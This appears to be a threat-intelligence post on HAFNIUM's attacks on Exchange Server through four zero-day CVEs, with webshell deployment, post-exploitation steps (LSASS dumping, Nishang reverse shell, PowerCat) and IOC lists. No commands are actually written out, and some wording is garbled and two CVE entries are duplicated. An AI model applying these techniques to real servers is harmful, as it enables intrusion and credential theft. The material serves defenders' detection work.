exchange

HAFNIUM Attacks Exchange Servers with Zero-days

Introduction

Microsoft has detected multiple zero-day vulnerabilities that can be used to attack the local version of Microsoft Exchange Server. Microsoft attributed the attack to a Group called HAFNIUM. Based on the observed TTP, the assessment believes that the organization is funded by the Chinese government and operates outside of China.

HAFNIUM mainly targets entities in multiple industries in the United States, including infectious disease researchers, law firms, higher education institutions, defense contractors, policy think tanks, and non-governmental organizations.

In this campaign, Microsoft observed HAFNIUM interacting with Office 365 victims. Although they usually cannot successfully compromise customer accounts, this reconnaissance activity can help attackers gather more information about the target environment.

Technology

Microsoft provides the following information to help customers understand these technologies and be able to more effectively defend against future attacks on unpatched systems:

  • CVE-2021-26855 is a server-side request forgery (SSRF) in Exchange, which enables attackers to send arbitrary HTTP requests and authenticate through Exchange Server.
  • CVE-2021-26857 is an insecure deserialization in the unified messaging service. Insecure deserialization is where an untrusted user can control the data being deserialized by the program. Using this vulnerability, HAFNIUM can run code as SYSTEM on the Exchange server. This requires administrator rights or another vulnerability to be exploited.
  • CVE-2021-26858 is an arbitrary file writing after authentication in Exchange. If HAFNIUM can authenticate through the Exchange server, they can use this vulnerability to write files to any path on the server. They can authenticate by exploiting the CVE-2021-26855 SSRF vulnerability or by destroying the credentials of legitimate administrators.
  • CVE-2021-27065 is an arbitrary file writing after authentication in Exchange. If HAFNIUM can authenticate through the Exchange server, they can use this vulnerability to write files to any path on the server. They can authenticate by exploiting the CVE-2021-26855 SSRF vulnerability or by destroying the credentials of legitimate administrators.

Detail

After exploiting the vulnerability to gain initial access, HAFNIUM deployed WebShell on the infected server. WebShell enables attackers to steal data and perform other malicious operations, leading to further harm. The following is an example of a WebShell deployed by HAFNIUM written in ASP:

hafnium webshell

After deploying WebShell, HAFNIUM performed the following post-infiltration activities:

  • Use Procdump to dump the memory of the LSASS process:
  • Use 7-Zip to compress the stolen data into a ZIP file for penetration:
  • Add and use the Exchange PowerShell snap-in to export mailbox data:
  • Use Nishang Invoke-PowerShellTcpOneLine reverse shell:
  • Download PowerCat from GitHub, and then use it to open a connection to the remote server:

HAFNIUM operators can also download the Exchange offline address book from the infected system, which contains information about the organization and its users.

IOCs

IPs:
103.77.192.219
104.140.114.110
104.250.191.110
108.61.246.56
149.28.14.163
157.230.221.198
167.99.168.251
185.250.151.72
192.81.208.169
203.160.69.66
211.56.98.146
5.2.69.14
5.254.43.18
80.92.205.81
91.192.103.43


WebShell:
4d3453f05a6706de277b9eebf9ac52c9
fd3f42bbdc6da346bc58a05da4bdd33c
4c72d7c7507d3b8bf2a33c60c19de1a3

bc0467bbcce548031b850933b4ab1613328ef5e6
d8c5eeef54952fb1e7d5c9501d3db712e53c4d0d
920a5611d37567c5ca4a597828994c8fc166f4d4
0ecd53fc8d302d97cda5a4527e8a59e961a748f811e86992bb65a575b1657019
2aeb1662fe1244ccf0e380c681f6f1760905ab8104a2ff5b4cce99b9d3249525
2fb7d8c8a579cac863a30b131f1058f550c0671bb5ccd57507a85794c3a6e774
b75f163ca9b9240bf4b37ad92bc7556b40a17e27c2b8ed5c8991385fe07d17d0
097549cf7d0f76f0d99edf8b2d91c60977fd6a96e4b8c3c94b0b1733dc026d3e
2b6f1ebb2208e93ade4a6424555d6a8341fd6d9f60c25e44afe11008f5c1aad1
65149e036fff06026d80ac9ad4d156332822dc93142cf1a122b1841ec8de34b5
511df0e2df9bfa5521b588cc4bb5f8c5a321801b803394ebc493db1ef3c78fa1
4edc7770464a14f54d17f36dc9d0fe854f68b346b27b35a6f5839adf1f13f8ea
811157f9c7003ba8d17b45eb3cf09bef2cecd2701cedb675274949296a6a183d
1631a90eb5395c4e19c7dbcbf611bbe6444ff312eb7937e286e4637cb9e72944


WebShells in the following paths:
C:\inetpub\wwwroot\aspnet_client\
C:\inetpub\wwwroot\aspnet_client\system_web\


Exchange Server installation paths:
%PROGRAMFILES%\Microsoft\Exchange Server\V15\FrontEnd\HttpProxy\owa\auth\
C:\Exchange\FrontEnd\HttpProxy\owa\auth\


WebShells file names:
aspnet_client.aspx
aspnet_iisstart.aspx
aspnet_www.aspx
document.aspx
errorEE.aspx
errorEEE.aspx
errorEW.aspx
errorFF.aspx
error_page.aspx
healthcheck.aspx
help.aspx
Logout.aspx
one.aspx
OutlookEN.aspx
RedirSuiteServerProxy.aspx
shell.aspx
supp0rt.aspx
web.aspx
xx.aspx


Paths for LSASS dumps:
C:\windows\temp\
C:\root\